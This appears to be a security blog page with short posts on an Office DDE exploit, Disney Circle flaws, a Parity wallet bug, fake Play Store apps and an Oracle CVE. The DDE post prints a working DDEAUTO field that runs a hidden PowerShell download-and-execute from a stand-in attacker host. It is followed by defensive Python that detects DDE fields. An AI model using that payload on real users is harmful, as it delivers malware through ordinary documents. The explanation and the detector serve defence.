Hackers Using Unpatched Microsoft Dynamic Data Exchange Exploit

There is a vulnerability in Microsoft Office's Dynamic Data Exchange (DDE) protocol. Exploiting it requires "no macros or memory corruption", and, if implemented correctly, it shows no security warnings and does not raise flags with antivirus software. Thousands of applications use the DDE protocol, including MS Word and Excel.

DDE allows two running applications to share data, either once or whenever new data becomes available. For example, one could use DDE to target a cell in Excel and receive updates whenever that cell is edited, syncing a cell in your own Excel document with the cell in the original document.

The blog post from Sensepost focused on using Microsoft Word and DDE to gain undetected command execution. The exploit is performed by adding a field to a Word document, which produces an error message, and then editing the field code behind that error to contain something like the following:

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }

Or, you could do something worse than open the calculator, like this:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}

Basically, you tell Word to execute an automatically updating DDE field, and then have the field launch the command prompt, which in turn calls your payload. In the proof-of-concept demonstration, they used a PowerShell command to launch an Empire stager as the payload.

Whenever the Word document is opened, it first asks for permission to update the file from a linked file. If you deal with DDE regularly, this would be nothing unusual. A second prompt then appears, a security warning because the DDE field is requesting access to the command prompt; however, according to the blog this can be hidden with "proper syntax modification". Then you just have to get the Word file onto the target system, get the target to open it, and have them click OK on the one prompt that pops up allowing the data to be shared. Boom, payload delivered.

Microsoft was sent this exploit, replicated it, and decided that it was a feature, so it will not be patched anytime soon. Microsoft has also released a Security Advisory regarding various DDE-related vulnerabilities; most of its mitigations involve the user changing settings to secure and control Office. This requires the Registry Editor, which, if used incorrectly, can break your computer and require you to reinstall your OS.

This vulnerability is now being exploited by cybercriminals and state-sponsored hackers. Notably, it has been used by the hacking group "Fancy Bear", which is believed to be affiliated with the Russian government. In recent weeks they have been running a spear-phishing campaign themed around the New York terror attack to bait users into opening the malicious documents, infecting their systems with malware. It has also been used against several organizations and companies in various forms.

Since DDE is a Microsoft process, nothing will stop it from running whatever is sent through it. One way to protect yourself is to disable DDE entirely on your machines. You can also follow Microsoft's recommendation of using the Registry Editor to secure Office, or go into the settings of some of the apps that use DDE and disable automatic updating or receiving updates from other DDE applications. As always, don't click links or download files from emails unless you are certain that the source is safe.
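On the defensive side, here is an added example (not from the Sensepost post or any of the sources below) that triages .docx attachments for DDE/DDEAUTO field codes before they reach a user, the way a mail gateway or IR script might. It assumes only the Python standard library and a constructed sample document built inline; the sample reuses the page's calc.exe field, split across two runs as Word may serialise a field instruction.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)  # whole-word DDE / DDEAUTO

def field_instructions(docx_bytes):
    """Yield (part, instruction) for every field in a .docx given as bytes.
    Complex fields are rebuilt from the w:instrText runs between fldChar begin/end
    markers, so a DDEAUTO split across runs is still seen; w:fldSimple has @w:instr."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue  # scans document, headers, footers, footnotes alike
            depth, buf = 0, []
            for el in ET.fromstring(z.read(name)).iter():
                if el.tag == W + "fldSimple":
                    yield name, el.get(W + "instr", "")
                elif el.tag == W + "fldChar":
                    kind = el.get(W + "fldCharType")
                    if kind == "begin":
                        depth += 1
                        if depth == 1:
                            buf = []  # outermost field starts: reset accumulator
                    elif kind == "end" and depth > 0:
                        depth -= 1
                        if depth == 0:
                            yield name, "".join(buf)
                elif el.tag == W + "instrText" and depth > 0:
                    buf.append(el.text or "")

def find_dde_fields(docx_bytes):
    """Field instructions invoking DDE/DDEAUTO: a triage signal, not proof of malice."""
    return [(p, i.strip()) for p, i in field_instructions(docx_bytes) if DDE_RE.search(i)]

def build_sample_docx(body_xml):
    """Constructed minimal .docx (only word/document.xml) for offline testing."""
    doc = '<w:document xmlns:w="%s"><w:body><w:p>%s</w:p></w:body></w:document>' % (W[1:-1], body_xml)
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as z:
        z.writestr("word/document.xml", doc)
    return out.getvalue()

# Constructed sample: the page's calc.exe field with DDEAUTO split across two runs.
SAMPLE = build_sample_docx(
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r><w:r><w:instrText>DDEAU</w:instrText></w:r>'
    '<w:r><w:instrText>TO c:\\\\windows\\\\system32\\\\cmd.exe "/k calc.exe"</w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>')
```

Legitimate linked documents also use DDE fields, so treat a hit as a reason to quarantine and inspect rather than a verdict; obfuscated variants built from other field types (for example QUOTE with character codes) need a separate check.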

Daniel Szafran

Article Sources:

Macro-less Code Exec in MSWord – (contains demo and proof of concept for the exploit)

Russian ‘Fancy Bear’ Hackers Using (Unpatched) Microsoft Office DDE Exploit

Microsoft Security Advisory 4053440

The Security of Disney’s Circle Device

When thinking about Disney, most people think of the amusement park rides, the cartoons, or even the luxurious restaurants, shops, and hotels that the company has created. This general branding of Disney™ has established the idea of a kid-friendly and family-oriented experience. Disney is fairly new to the technology game and is always trying to integrate its research and new technologies, mostly within its theme parks. One product that has nothing to do with the theme parks or cartoons that Disney stands for is called the Circle.

The Circle is a device made to connect a family's devices together and, most importantly, to keep kids off certain websites. The idea is to be able to monitor devices without the hassle of loading software onto every one of them. The product connects to all devices on the same network (wired or wireless), and the Circle's host user is able to set time limits on device use, block content, and view whatever is happening on the devices. Even though the idea behind this device that Disney put out was good, a number of vulnerabilities turned up in the software and product, two of which stand out.

The first vulnerability involves a notification bug in the Circle's software. Specially crafted network packets can lead to OS command injection: an attacker sends an HTTP request to trigger the vulnerability (CVE-2017-2917). The second vulnerability involves a bug in the signature verification of firmware updates for the Circle. An attacker who crafts the right network packets can cause unsigned firmware to be installed, after which alternate code can be loaded onto the device (CVE-2017-2898).

Overall, multiple vulnerabilities are associated with this device released by Disney. Disney should have tested it against common vulnerability classes before the Circle launched. To prevent further attacks, Disney should go through these vulnerabilities and patch them, along with building a stronger protective layer into the device against future attacks of a similar kind.

-Ryan Keihm

Resources

www.zdnet.com/article/circle-with-disney-web-filter-riddled-with-vulnerabilities

https://www.disneyresearch.com/

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2917

http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2898

https://disneyprogramsblog.com/security-professional-development-study/

Please, Perform Proper Pre-release Procedures

Parity Wallet, a wallet used for storing Ethereum, had a serious vulnerability in its multi-factor wallets exposed in July. One party could take over ownership of another's wallet. A white hat group of Ethereum users realized what was going on and used the same vulnerability to claim every other user's wallet so that the original actor (a black hat, who stole roughly $30 million) could not. On July 20th, this vulnerability was patched.

Now there’s a new issue.

Any multi-factor wallets created or updated after the July 20th patch can no longer move money out. This is because calling initWallet simply converts a contract library into a multi-factor wallet instead of allowing one to use the wallet.

This is not an issue with Ethereum at large, only with Parity Multi-factor wallets.

Official post: https://paritytech.io/blog/security-alert.html

By: Connor Shade

Google Play Store Fails Vetting Again…

In case you haven't noticed, I like beating up on the Google Play Store just a bit. More fake apps have been released onto the Play Store. Instead of stealing personal information through phony banking apps, attackers are now spamming users with ads through fake WhatsApp Messenger lookalikes.

Oracle Identity Manager Hacked through a Critical Flaw

Based in Redwood, California, Oracle Corporation is the largest software company whose primary business is database products. Historically, Oracle has targeted high-end workstations and minicomputers as the server platforms for its database systems. Its relational database was the first to support the SQL language, which has since become the industry standard.

An exploit was found in Oracle's identity management system. The underlying flaw has been assigned CVE-2017-10151 and the highest CVSS score of 10, and it is easy to exploit without any user interaction.

This CVE is due to a security loophole involving a default account that allows an unauthenticated attacker on the same network to compromise Oracle Identity Manager over HTTP.

The full details of this vulnerability have not yet been released by Oracle.

“This vulnerability is remotely exploitable without authentication, i.e., may be exploited over a network without requiring user credentials,” Oracle’s advisory reads.

The easily exploitable vulnerability affects Oracle Identity Manager versions 11.1.1.7, 11.1.1.9, 11.1.2.1.0, 11.1.2.2.0, 11.1.2.3.0 and 12.2.1.3.0.

Oracle has already released patches for all affected versions of the product. All users should update to the latest version of Oracle Identity Manager to close the vulnerability before an attacker has the chance to exploit it.

Justin Palmer

Sources:

https://thehackernews.com/2017/10/oracle-identity-manager.html

https://www.oracle.com/index.html